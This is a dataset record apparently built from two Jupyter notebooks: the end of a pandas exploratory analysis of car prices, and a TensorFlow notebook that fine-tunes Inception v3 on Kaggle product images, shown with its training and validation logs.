"Collecting tables\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/ed/c3/8fd9e3bb21872f9d69eb93b3014c86479864cca94e625fd03713ccacec80/tables-3.6.1-cp36-cp36m-manylinux1_x86_64.whl (4.3MB)\n\u001b[K |████████████████████████████████| 4.3MB 2.9MB/s \n\u001b[?25hRequirement already satisfied, skipping upgrade: numexpr>=2.6.2 in /usr/local/lib/python3.6/dist-packages (from tables) (2.7.1)\nRequirement already satisfied, skipping upgrade: numpy>=1.9.3 in /usr/local/lib/python3.6/dist-packages (from tables) (1.17.5)\nInstalling collected packages: tables\n Found existing installation: tables 3.4.4\n Uninstalling tables-3.4.4:\n Successfully uninstalled tables-3.4.4\nSuccessfully installed tables-3.6.1\n"
],
[
"cd \"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_2/dw_matrix_car\"",
"/content/drive/My Drive/Colab Notebooks/dw_matrix/matrix_2/dw_matrix_car\n"
],
[
"df = pd.read_hdf('data/car.h5')",
"_____no_output_____"
],
[
"df.columns.values",
"_____no_output_____"
],
[
"df['price_value'].hist(bins=100);",
"_____no_output_____"
],
[
"df['price_value'].describe()",
"_____no_output_____"
],
[
"df['param_marka-pojazdu'].unique()",
"_____no_output_____"
],
[
"(\n df\n .groupby('param_marka-pojazdu')['price_value']\n .agg(np.median)\n .sort_values(ascending=False)\n .head(50)\n).plot(kind='bar', figsize=(15,5))",
"_____no_output_____"
],
[
"(\n df\n .groupby('param_marka-pojazdu')['price_value']\n .agg([np.mean, np.median, np.size])\n .sort_values(by='size', ascending=False)\n .head(50)\n).plot(kind='bar', figsize=(15,5), subplots=True)",
"_____no_output_____"
],
[
"def group_and_barplot(feat_groupby, feat_agg='price_value', agg_funcs=[np.mean, np.median, np.size], feat_sort='mean', top=50, subplots=True ):\n return (\n df\n .groupby(feat_groupby)[feat_agg]\n .agg(agg_funcs)\n .sort_values(by=feat_sort, ascending=False)\n .head(top)\n ).plot(kind='bar', figsize=(15,5), subplots=subplots)",
"_____no_output_____"
],
[
"group_and_barplot('param_marka-pojazdu');",
"_____no_output_____"
],
[
"group_and_barplot('param_kraj-pochodzenia', feat_sort='size');",
"_____no_output_____"
],
[
"group_and_barplot('param_kolor', feat_sort='mean');",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70651a7e05394eee523efdcfc43480a11676916 | 437,603 | ipynb | Jupyter Notebook | ProductImageClassification/.ipynb_checkpoints/InceptionTrainAndVal160-checkpoint.ipynb | HiKapok/KaggleCompetitions | 3d8c0e8d8f98334980c97f761262316edcd6d5e9 | [
"MIT"
] | 1 | 2018-06-27T14:14:01.000Z | 2018-06-27T14:14:01.000Z | ProductImageClassification/.ipynb_checkpoints/InceptionTrainAndVal160-checkpoint.ipynb | HiKapok/KaggleCompetitions | 3d8c0e8d8f98334980c97f761262316edcd6d5e9 | [
"MIT"
] | 1 | 2017-12-30T01:01:52.000Z | 2018-01-05T04:09:32.000Z | ProductImageClassification/.ipynb_checkpoints/InceptionTrainAndVal160-checkpoint.ipynb | HiKapok/KaggleCompetitions | 3d8c0e8d8f98334980c97f761262316edcd6d5e9 | [
"MIT"
] | 1 | 2018-06-27T14:14:16.000Z | 2018-06-27T14:14:16.000Z | 67.251114 | 221 | 0.671867 | [
[
[
"# Running %env without any arguments\n# lists all environment variables\n\n# The line below sets the environment\n# variable CUDA_VISIBLE_DEVICES\n%env CUDA_VISIBLE_DEVICES = 0\n\nimport numpy as np\nimport pandas as pd\nimport io\nimport time\nimport bson # this is installed with the pymongo package\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imread, imsave\nimport tensorflow as tf\nfrom tensorflow.python.platform import tf_logging\nfrom tensorflow.contrib import layers\nfrom tensorflow.contrib.training import add_gradients_summaries\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_ops\nfrom tensorflow.python.training import optimizer as tf_optimizer\nfrom tensorflow.python.ops import variables as tf_variables\nimport os.path\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim.python.slim.nets import inception\nimport inception_preprocessing\nimport logging\n\n# This is a bit of magic to make matplotlib figures appear inline in the notebook\n# rather than in a new window.\n%matplotlib inline\nplt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\n# Some more magic so that the notebook will reload external python modules;\n# see http://stackoverflow.com/questions/1907993/autoreload-of-modules-in-ipython\n%load_ext autoreload\n%autoreload 2",
"env: CUDA_VISIBLE_DEVICES=0\n"
],
[
"DATASET_PATH = '/media/rs/0E06CD1706CD0127/Kapok/kaggle/'\nPRETRAINED_MODEL_PATH = DATASET_PATH + 'inception-v3/20160828/inception_v3.ckpt'\n#PRETRAINED_MODEL_PATH = DATASET_PATH + 'logs/before/inception_v3_model.ckpt-810491'\nLOG_PATH = DATASET_PATH + 'logs/'\nTRAIN_PATH = DATASET_PATH + 'Split1/Train/'\nVAL_PATH = DATASET_PATH + 'Split1/Validation/'\nTEST_PATH = DATASET_PATH + 'Test/'\nCATEGORY_NAME_PATH = DATASET_PATH + 'category_names.csv'\nBATCH_SIZE = 128#256\n\n# total_batch_size is BATCH_SIZE * ACCUMULATE_STEP\nACCUMULATE_STEP = 4\n\nIMAGE_WIDTH = 180\nIMAGE_HEIGHT = 180\nNUM_CLASS = 5270\n# validation examples num: 2319624\n# train examples num: 10051704\n# total step: 157057\nTOTAL_EXAMPLES = 10051704\n# validation num = 2319624\nVAL_CHECK_FREQ = 50\nNUM_EPOCHES = 7\nINPUT_THREADS = 6\nEPOCHES_OVER = 7\n#Learning rate information and configuration (Up to you to experiment)\n# initial_learning_rate = 0.000003#0.00001\n# learning_rate_decay_factor = 0.94\ninitial_learning_rate = 0.001#0.00001\nlearning_rate_decay_factor = 0.6\nnum_epochs_before_decay = 1\n#Know the number steps to take before decaying the learning rate and batches per epoch\nmoving_average_decay = 0.9\nmomentum = 0.8\nnum_steps_per_epoch = TOTAL_EXAMPLES / (BATCH_SIZE * ACCUMULATE_STEP) + 1\ndecay_steps = int(num_epochs_before_decay * num_steps_per_epoch / 6)",
"_____no_output_____"
],
[
"# get TF logger\nlog = logging.getLogger('tensorflow')\nlog.setLevel(logging.DEBUG)\n\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# create file handler which logs even debug messages\nfh = logging.FileHandler(DATASET_PATH + 'tensorflow_inception_160_train.log')\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(formatter)\nlog.addHandler(fh)",
"_____no_output_____"
],
[
"class MiniDataSet(object):\n def __init__(self, file_path_pattern, category_level_csv, num_examples, num_classes, is_training = True, min_after_dequeue=2000, batch_size = BATCH_SIZE, num_epochs = NUM_EPOCHES, num_reader = INPUT_THREADS):\n super(MiniDataSet, self).__init__()\n self._num_examples = num_examples\n self._num_classes = num_classes\n self._file_path_pattern = file_path_pattern\n self._category_level_csv = category_level_csv\n self._num_reader = num_reader\n self._batch_size = batch_size\n self._num_epochs = num_epochs\n self._min_after_dequeue = min_after_dequeue\n self._is_training = is_training\n \n def get_category_description_from_csv(self, level = 0):\n category_map = dict()\n csv = pd.read_csv(self._category_level_csv).values\n for row in csv: \n category_id, levels = row[0], row[1:]\n category_map[category_id] = levels[level]\n return category_map\n\n def create_dataset(self):\n opts = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.ZLIB)\n reader = lambda : tf.TFRecordReader(options=opts)\n keys_to_features = {\n 'img_raw': tf.FixedLenFeature([], tf.string, default_value=''),\n 'product_id': tf.FixedLenFeature([], tf.int64, default_value=tf.zeros([], dtype=tf.int64)),\n # notice that we don't have this feature in our TFRecord, so always default provided\n 'format': tf.FixedLenFeature([], tf.string, default_value='jpg'),\n 'category_id': tf.FixedLenFeature([], tf.int64, default_value=tf.zeros([], dtype=tf.int64))\n }\n\n items_to_handlers = {\n # automated decode image from features in FixedLenFeature\n 'image': slim.tfexample_decoder.Image(image_key='img_raw', format_key='format'),\n 'label': slim.tfexample_decoder.Tensor('category_id'),\n }\n\n decoder = slim.tfexample_decoder.TFExampleDecoder(keys_to_features, items_to_handlers)\n\n labels_to_name_dict = self.get_category_description_from_csv()\n\n self._dataset = slim.dataset.Dataset(\n data_sources = self._file_path_pattern,\n decoder = decoder,\n reader = reader,\n # num_readers = 8,\n num_samples = self._num_examples,\n #num_classes = self._num_classes,\n #labels_to_name = labels_to_name_dict,\n items_to_descriptions = None)\n \n # notice that DatasetDataProvider can automate shuffle the examples by ParallelReader using its RandomShuffleQueue\n self._data_provider = slim.dataset_data_provider.DatasetDataProvider(\n self._dataset,\n num_readers = self._num_reader,\n shuffle = True, # default is True\n num_epochs = self._num_epochs,\n common_queue_capacity = self._min_after_dequeue + 3 * self._batch_size,\n common_queue_min = self._min_after_dequeue,\n scope = self._is_training and 'train_files' or 'validation_files')\n \n return self._data_provider.get(['image', 'label'])\n ",
"_____no_output_____"
],
[
"def preprocess_for_inception(input_image, is_training = True):\n # inception_v3.default_image_size = 299\n return inception_preprocessing.preprocess_image(input_image, 160, 160, True)#is_training)",
"_____no_output_____"
],
[
"def cvt_csv2tfrecord():\n count = 0\n category_map = dict()\n csv = pd.read_csv(CATEGORY_NAME_PATH).values\n for row in csv: \n category_id, _ = row[0], row[1:]\n category_map[category_id] = count\n count += 1\n return category_map",
"_____no_output_____"
],
[
"def one_hot_process(org_label, map_table, num_classes):\n return tf.one_hot(map_table.lookup(tf.as_string(org_label)), num_classes, axis=-1)",
"_____no_output_____"
],
[
"def my_create_train_op(total_loss, optimizer, summarize_gradients = False, accumulate_factor=None):\n global_step = tf.train.get_or_create_global_step()\n\n update_ops = set(ops.get_collection(ops.GraphKeys.UPDATE_OPS))\n\n # Make sure update_ops are computed before total_loss.\n if update_ops:\n with ops.control_dependencies(update_ops):\n barrier = control_flow_ops.no_op(name='update_barrier')\n total_loss = control_flow_ops.with_dependencies([barrier], total_loss)\n\n variables_to_train = tf_variables.trainable_variables()\n\n # initialized with 0s\n accum_vars = [tf.Variable(tf.zeros_like(tv.initialized_value()), trainable=False) for tv in variables_to_train]\n zero_ops = [tv.assign(tf.zeros_like(tv)) for tv in accum_vars]\n\n # Calls the compute_gradients function of the optimizer to obtain... the list of gradients\n grads = optimizer.compute_gradients(\n total_loss,\n variables_to_train,\n gate_gradients=tf_optimizer.Optimizer.GATE_OP,\n aggregation_method=None,\n colocate_gradients_with_ops=False)\n\n ## Adds to each element from the list you initialized earlier with zeros its gradient (works because accum_vars and grads are in the same order)\n if accumulate_factor is not None: \n total_loss = array_ops.check_numerics(total_loss, 'LossTensor is inf or nan')\n with tf.control_dependencies([total_loss]):\n accum_ops = [accum_vars[i].assign_add(gv[0]) for i, gv in enumerate(grads) if gv[0] is not None]\n\n ## Define the training step (part with variable value update)\n accumulate_grads = [(tf.multiply(accum_vars[i], accumulate_factor), gv[1]) for i, gv in enumerate(grads) if gv[0] is not None]\n #accumulate_grads = [(accum_vars[i], gv[1]) for i, gv in enumerate(grads) if gv[0] is not None]\n else:\n accum_ops = tf.ops.no_op\n \n if accumulate_factor is not None: \n # Summarize gradients.\n if summarize_gradients:\n with ops.name_scope('summarize_grads'):\n add_gradients_summaries(accumulate_grads)\n grad_updates = optimizer.apply_gradients(accumulate_grads, global_step=global_step)\n else:\n # Summarize gradients.\n if summarize_gradients:\n with ops.name_scope('summarize_grads'):\n add_gradients_summaries(grads)\n grad_updates = optimizer.apply_gradients(grads, global_step=global_step)\n\n with ops.name_scope('train_op'):\n # Ensure the train_tensor computes grad_updates.\n train_op = control_flow_ops.with_dependencies([grad_updates], total_loss)\n\n # Add the operation used for training to the 'train_op' collection\n train_ops = ops.get_collection_ref(ops.GraphKeys.TRAIN_OP)\n if train_op not in train_ops:\n train_ops.append(train_op)\n\n return train_op, accum_ops, zero_ops",
"_____no_output_____"
],
[
"def_graph = tf.Graph()\nwith def_graph.as_default() as graph:\n def train_step(input_examples, one_hot_labels): \n with slim.arg_scope(inception.inception_v3_arg_scope()):\n # here logits is the pre-softmax activations\n logits, end_points = inception.inception_v3(\n input_examples,\n num_classes = NUM_CLASS,\n is_training = True)\n\n # Create the global step for monitoring the learning_rate and training.\n # since supervisor will also create one global_step, so we create n advance in order to feed into exponential_decay\n global_step = tf.train.get_or_create_global_step(graph = graph)\n \n #variables_to_restore = slim.get_variables_to_restore()\n variables_to_restore = slim.get_variables_to_restore(exclude = ['InceptionV3/Logits', 'InceptionV3/AuxLogits'])\n #variables_to_restore_from_checkpoint = slim.get_variables_to_restore(exclude = variables_to_exclude)\n # Performs the equivalent to tf.nn.sparse_softmax_cross_entropy_with_logits but enhanced, e.x. label smothing\n loss = tf.losses.softmax_cross_entropy(onehot_labels = one_hot_labels, logits = logits)\n aux_loss = tf.losses.softmax_cross_entropy(onehot_labels = one_hot_labels, logits = end_points['AuxLogits'], weights=0.2)\n total_loss = tf.losses.get_total_loss() # obtain the regularization losses as well\n\n \n\n #Define your exponentially decaying learning rate\n lr = tf.train.exponential_decay(\n learning_rate = initial_learning_rate,\n global_step = global_step,\n decay_steps = decay_steps,\n decay_rate = learning_rate_decay_factor,\n staircase = True)\n\n #Now we can define the optimizer that takes on the learning rate\n optimizer = tf.train.AdamOptimizer(learning_rate = lr)\n #optimizer = tf.train.MomentumOptimizer(learning_rate = lr, momentum=momentum)\n \n moving_average_variables = slim.get_model_variables()\n variable_averages = tf.train.ExponentialMovingAverage(moving_average_decay, global_step)\n # Use an alternative set of update ops in addition to the default updates:\n tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, variable_averages.apply(moving_average_variables))\n\n #Create the train_op.\n accumulate_factor = tf.constant([1./ACCUMULATE_STEP], name='accumulate_factor')\n train_op, accum_ops, zero_ops = my_create_train_op(total_loss, optimizer, False, accumulate_factor)\n #Create the train_op.\n #train_op = slim.learning.create_train_op(total_loss, optimizer, summarize_gradients=False)\n\n #State the metrics that you want to predict. We get a predictions that is not one_hot_encoded.\n predictions = tf.argmax(end_points['Predictions'], 1)\n probabilities = end_points['Predictions']\n accuracy, accuracy_update = tf.contrib.metrics.streaming_accuracy(predictions, tf.argmax(one_hot_labels, 1))\n metrics_op = tf.group(accuracy_update)\n\n\n #Now finally create all the summaries you need to monitor and group them into one summary op.\n tf.summary.scalar('losses/Total_Loss', total_loss)\n tf.summary.scalar('accuracy', accuracy)\n tf.summary.scalar('learning_rate', lr)\n\n return train_op, accum_ops, zero_ops, global_step, metrics_op, variables_to_restore, predictions, lr, accuracy, total_loss\n\n def validation_step(input_examples, one_hot_labels): \n with slim.arg_scope(inception.inception_v3_arg_scope()):\n # here logits is the pre-softmax activations\n logits, end_points = inception.inception_v3(\n input_examples,\n num_classes = NUM_CLASS,\n is_training=False, reuse=True)\n\n #State the metrics that you want to predict. 
We get a predictions that is not one_hot_encoded.\n predictions = tf.argmax(end_points['Predictions'], 1)\n probabilities = end_points['Predictions']\n accuracy, accuracy_update = tf.contrib.metrics.streaming_accuracy(predictions, tf.argmax(one_hot_labels, 1))\n metrics_op = tf.group(accuracy_update)\n\n #Now finally create all the summaries you need to monitor and group them into one summary op.\n tf.summary.scalar('validation/accuracy', accuracy)\n\n return metrics_op, accuracy, predictions, probabilities",
"_____no_output_____"
],
[
"with def_graph.as_default() as graph:\n def init_dataset(file_path_pattern, mapping_table, is_training = True):\n dataset = MiniDataSet(file_path_pattern, CATEGORY_NAME_PATH, TOTAL_EXAMPLES, NUM_CLASS, is_training = is_training)\n org_image, org_label = dataset.create_dataset()\n image = preprocess_for_inception(org_image, is_training) # final image to train\n\n label = one_hot_process(org_label, mapping_table, NUM_CLASS) # final label for training\n # no need for shuffle, DatasetDataProvider do this for us\n batch_images, batch_labels = tf.train.batch([image, label], BATCH_SIZE,\\\n num_threads = INPUT_THREADS,\\\n capacity = 2000 + 3 * BATCH_SIZE,\\\n allow_smaller_final_batch = is_training, name = is_training and 'train_batch' or 'validation_batch')\n \n return batch_images, batch_labels",
"_____no_output_____"
],
[
"with def_graph.as_default() as graph:\n mapping_strings = tf.constant( [ str(key) for key in cvt_csv2tfrecord().keys() ] )\n mapping_table = tf.contrib.lookup.index_table_from_tensor(mapping=mapping_strings, default_value=0)\n batch_images, batch_labels = init_dataset(TRAIN_PATH + \"output_file*.tfrecords\", mapping_table)\n batch_val_images, batch_val_labels = init_dataset(VAL_PATH + \"test_output_file*.tfrecords\", mapping_table, False)\n with tf.device('/gpu:0'):\n train_op, accum_op, zero_op, global_step, metrics_op, variables_to_restore, pred_op, lr, accuracy, total_loss = train_step(batch_images, batch_labels)\n val_metrics_op, val_accuracy, val_predictions, val_probabilities = validation_step(batch_val_images, batch_val_labels)\n real_val_label = tf.argmax(batch_val_labels, 1)\n \n global_step_zero = global_step.assign(tf.zeros_like(global_step))\n \n summary_op = tf.summary.merge_all()\n # Create a saver that restores only the pre-trained variables.\n # we have change optim, restore all param use pretrained mode\n #pre_train_saver = tf.train.Saver(variables_to_restore)\n \n variables = slim.get_variables_to_restore()\n restore_from_pretrained = tf.contrib.framework.filter_variables(\n variables,\n include_patterns=None,\n exclude_patterns=['ExponentialMovingAverage', 'accumulate_factor', 'Momentum', 'InceptionV3/Logits', 'InceptionV3/AuxLogits'])\n\n pre_train_saver = tf.train.Saver(variables_to_restore)\n # Define an init function that loads the pretrained checkpoint.\n # sess is the managed session passed by Supervisor\n def load_pretrain(sess):\n pre_train_saver.restore(sess, PRETRAINED_MODEL_PATH)\n\n # no need for specify local_variables_initializer and tables_initializer, Supervisor will do this via default local_init_op\n # init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer(), tf.tables_initializer())\n init_op = tf.group(tf.global_variables_initializer())\n # Pass the init function to the supervisor.\n # - The init function is called _after_ the variables have been initialized by running the init_op.\n # - use default tf.Saver() for ordinary save and restore\n # - save checkpoint every 1.3 hours(4800)\n # - manage summary in current process by ourselves for memory saving\n # - no need to specify global_step, supervisor will find this automately\n # - initialize order: checkpoint -> local_init_op -> init_op -> init_func\n sv = tf.train.Supervisor(logdir=LOG_PATH, init_fn = load_pretrain, init_op = init_op, summary_op = None, save_model_secs=12000, checkpoint_basename='inception_v3_model.ckpt')\n \n final_loss = 0.\n final_accuracy = 0.\n training_state = True\n\n config = tf.ConfigProto(log_device_placement=True, allow_soft_placement=True)\n #config.gpu_options.allow_growth = True\n with sv.managed_session(config=config) as sess:\n #with sv.prepare_or_wait_for_session(config=tf.ConfigProto(log_device_placement=True, allow_soft_placement=True)) as sess:\n\n #sess.run(global_step_zero)\n # Here sess was either initialized from the pre-trained-checkpoint or\n # recovered from a checkpoint saved in a previous run of this code.\n for step in range(int(num_steps_per_epoch * NUM_EPOCHES)): \n if sv.should_stop():\n tf_logging.info('Supervisor emit finished!')\n tf_logging.info('Current Loss: %s', loss)\n tf_logging.info('Current Accuracy: %s', accuracy)\n tf_logging.info('Saving current model to disk(maybe invalid).')\n training_state = False\n break\n\n start_time = time.time()\n\n if step % 1000 == 0:\n summ = sess.run(summary_op)\n 
sv.summary_computed(sess, summ)\n if step > EPOCHES_OVER * num_steps_per_epoch:\n raise StopIteration(\"over epoches reached.\")\n\n if step % VAL_CHECK_FREQ == 0:\n with tf.device('/gpu:0'):\n _, val_acc, val_pred, val_prob, real_label = sess.run([val_metrics_op, val_accuracy, val_predictions, val_probabilities, real_val_label])\n time_elapsed = time.time() - start_time\n tf_logging.info('Validation Speed: {:5.3f}sec/batch'.format(time_elapsed))\n tf_logging.info('Current Streaming ValAccuracy: {:5.3f}%'.format(val_acc*100.))\n tf_logging.info('Real Label: {}'.format(real_label))\n tf_logging.info('Pred Label: {}'.format(val_pred))\n\n else:\n with tf.device('/gpu:0'):\n # accumulate gradient to get bigger batch_size\n sess.run(zero_op)\n for _ in range(1, ACCUMULATE_STEP):\n sess.run([accum_op, total_loss])\n _, _, _, cur_loss, cur_acc, total_step, cur_lr = sess.run([train_op, accum_op, metrics_op, total_loss, accuracy, global_step, lr])\n# sess.run([train_op])\n time_elapsed = time.time() - start_time\n\n if step % 10 == 0:\n final_loss = cur_loss\n final_accuracy = cur_acc\n tf_logging.info('Current Speed: {:5.3f}sec/batch'.format(time_elapsed))\n tf_logging.info('Current Streaming Accuracy: {:5.3f}%'.format(cur_acc*100.))\n tf_logging.info('Current Loss: {:5.3f}'.format(cur_loss))\n tf_logging.info('Epoch %s/%s, Global Step: %s', int(total_step / num_steps_per_epoch + 1), NUM_EPOCHES, total_step)\n tf_logging.info('Current Learning Rate: {}'.format(cur_lr))\n \n if training_state:\n #We log the final training loss and accuracy\n tf_logging.info('Final Loss: %s', final_loss)\n tf_logging.info('Final Accuracy: %s', final_accuracy)\n # Once all the training has been done, save the log files and checkpoint model\n tf_logging.info('Finished training! Model saved.')\n sv.saver.save(sess, sv.save_path, global_step = sv.global_step)\n ",
"INFO:tensorflow:Restoring parameters from /media/rs/0E06CD1706CD0127/Kapok/kaggle/inception-v3/20160828/inception_v3.ckpt\nINFO:tensorflow:Starting standard services.\nINFO:tensorflow:Saving checkpoint to path /media/rs/0E06CD1706CD0127/Kapok/kaggle/logs/inception_v3_model.ckpt\nINFO:tensorflow:Starting queue runners.\nINFO:tensorflow:global_step/sec: 0\nINFO:tensorflow:Validation Speed: 15.979sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 0.000%\nINFO:tensorflow:Real Label: [3186 236 3778 4045 1453 3776 2821 4160 4023 2884 3623 1974 4835 4350 4159\n 4583 2923 4429 4792 4350 4279 4970 2816 1644 991 3501 1308 4279 1866 1282\n 1301 289 4279 3186 2499 3512 3800 1394 4393 4873 353 2761 396 3412 2736\n 3571 3069 140 2884 3692 4970 3623 4153 5090 4279 457 3379 457 1301 4245\n 2836 457 3623 2921 2938 3877 3807 3671 200 289 219 4045 3643 2831 2159\n 3920 3730 4429 4722 3279 4393 414 3631 672 991 4816 3501 1056 2647 3186\n 4279 289 3330 2159 3465 4814 232 2264 3328 289 1261 3929 289 3768 2849\n 457 2178 3583 3230 3162 991 2908 4970 991 1162 2886 3186 4792 2076 4393\n 1746 1607 4045 4429 2816 3411 4350 656]\nINFO:tensorflow:Pred Label: [1230 2280 3914 2035 5125 808 2855 808 1354 4130 1764 1977 3702 2568 2757\n 1504 738 4496 1549 2122 3487 401 384 4368 3617 1363 2757 3415 3349 4711\n 2931 4687 937 3274 3412 1697 2931 698 881 2990 3337 3134 3609 5237 4114\n 1259 1443 3429 4368 4009 3797 953 4858 4114 4114 2757 2757 206 4368 2757\n 4009 3551 4368 687 1915 1259 2717 2689 3274 3914 4368 1351 4706 4114 4955\n 808 2757 4124 2855 4368 2855 4828 4368 4114 3298 3274 2857 905 4466 4368\n 1259 4051 2301 4114 4403 937 2632 2757 1942 3274 1230 5073 4706 2757 1443\n 208 206 2301 3031 2632 2280 793 4368 4188 206 4368 2280 5257 1158 3274\n 4114 718 125 3234 1791 4114 3785 3914]\nINFO:tensorflow:Current Speed: 2.552sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 2.517%\nINFO:tensorflow:Current Loss: 11.022\nINFO:tensorflow:Epoch 1/7, Global Step: 10\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.446sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 3.207%\nINFO:tensorflow:Current Loss: 9.935\nINFO:tensorflow:Epoch 1/7, Global Step: 20\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.440sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 4.580%\nINFO:tensorflow:Current Loss: 10.109\nINFO:tensorflow:Epoch 1/7, Global Step: 30\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:global_step/sec: 0.308332\nINFO:tensorflow:Current Speed: 2.362sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 5.188%\nINFO:tensorflow:Current Loss: 10.048\nINFO:tensorflow:Epoch 1/7, Global Step: 40\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Validation Speed: 0.165sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 0.000%\nINFO:tensorflow:Real Label: [ 275 4153 3929 3807 4153 3539 4366 4248 2890 4045 3773 2923 1099 4045 1796\n 2886 377 229 4973 4045 4523 4814 662 292 3643 3234 2923 3623 289 1403\n 2878 4153 1372 3571 1372 4970 991 4205 3929 4350 4153 2938 4300 5254 4393\n 3692 4970 2649 2936 3138 4255 927 4970 4582 248 3104 4468 4875 2816 991\n 3329 377 4153 4814 2829 3185 4839 4160 3414 4873 2650 3279 5210 4223 1588\n 2923 2230 3623 3692 3891 2884 4802 289 4816 4810 5026 2884 3328 4153 185\n 2878 3185 3414 4393 2938 1551 3059 3328 4160 4792 999 289 3217 1239 289\n 168 991 457 4816 461 2908 1005 2948 688 3279 4160 2887 98 5089 5153\n 1956 4816 4816 
3078 3929 4816 3414 1282]\nINFO:tensorflow:Pred Label: [4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160 4160\n 4160 4160 4160 4160 4160 4160 4160 4160]\nINFO:tensorflow:Current Speed: 2.485sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 6.358%\nINFO:tensorflow:Current Loss: 8.855\nINFO:tensorflow:Epoch 1/7, Global Step: 59\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.541sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 7.261%\nINFO:tensorflow:Current Loss: 9.427\nINFO:tensorflow:Epoch 1/7, Global Step: 69\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.109sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 8.043%\nINFO:tensorflow:Current Loss: 9.123\nINFO:tensorflow:Epoch 1/7, Global Step: 79\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:global_step/sec: 0.416667\nINFO:tensorflow:Current Speed: 2.208sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 8.771%\nINFO:tensorflow:Current Loss: 8.476\nINFO:tensorflow:Epoch 1/7, Global Step: 89\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Validation Speed: 0.145sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 1.172%\nINFO:tensorflow:Real Label: [4350 229 4910 289 4330 4393 3336 2283 4045 2770 3795 4816 4350 2017 3692\n 2147 3932 3165 289 1475 3623 3331 4153 1453 4393 2908 4393 4816 3277 2878\n 4393 4663 3328 328 4064 991 4393 4153 1282 4816 3527 1435 3414 4341 4970\n 3623 991 3182 2108 4800 4393 289 1255 2938 1853 2821 662 3341 4335 5214\n 2908 3623 4894 3692 4837 4970 3730 377 4970 2908 289 3188 74 4045 3059\n 4390 1011 4045 3535 2063 4970 4816 2908 377 289 2349 2663 4816 3692 3328\n 4350 229 2718 3582 289 4656 4826 289 1956 4045 101 457 2608 4816 289\n 3262 805 3623 3830 3170 4350 4933 2908 4993 4815 4957 140 4839 1712 1836\n 991 2886 2647 3797 1161 2878 5032 3277]\nINFO:tensorflow:Pred Label: [3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165]\nINFO:tensorflow:Current Speed: 2.370sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 9.448%\nINFO:tensorflow:Current Loss: 8.608\nINFO:tensorflow:Epoch 1/7, Global Step: 108\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.586sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 9.829%\nINFO:tensorflow:Current Loss: 
